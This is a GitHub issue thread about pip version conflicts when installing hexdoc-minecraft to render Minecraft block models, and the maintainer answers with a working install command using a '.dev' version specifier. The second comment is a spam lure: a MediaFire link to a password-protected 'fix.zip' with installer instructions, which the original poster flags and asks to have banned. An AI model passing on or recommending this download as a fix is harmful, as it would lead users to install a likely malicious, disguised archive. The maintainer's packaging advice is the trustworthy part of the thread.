### ISSUE TITLE
Package misconfiguration running the model renderer standalone

### ISSUE THREAD

**Issue by mainrs** [hexdoc-dev/hexdoc#79]
Hello!

I wanted to get all vanilla blocks rendered as png files. I followed the instructions in the book: https://hexdoc.hexxy.media/docs/guides/standalone/model-rendering/

However, no matter what version combinations I use, I always get version conflicts. The `hexdoc-minecraft` package seems to require `hexdoc>=1!0.1.0rc1.dev0`, which doesn't exist.

the only package I was able to install into virtualenv was therefore `hexdoc`. And this is not enough, since it doesn't seem to know how to render minecraft assets.

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mainrs** [comment]
@object-Object you can ban them from ever interacting with the repository.

**Comment by object-Object** [comment]
ah. try adding `.dev` to the end of the hexdoc-minecraft version number, eg. `hexdoc-minecraft~=1.20.1.1.0.dev`. I just now tested specifically with this command, and it installed successfully:

`pip install hexdoc hexdoc-minecraft~=1.20.1.1.0.dev`

I released a version of `hexdoc-minecraft` a few months ago meant to work with the image api rewrite in progress on the `item-models` branch. Those versions end in `1.1.dev*`. The versions ending in `1.0.dev*` should be compatible with the versions of hexdoc which are currently published, but I guess pip won't select those unless you include `.dev` in the requested version number.

I'll update that docs page to clarify that. my bad ^^
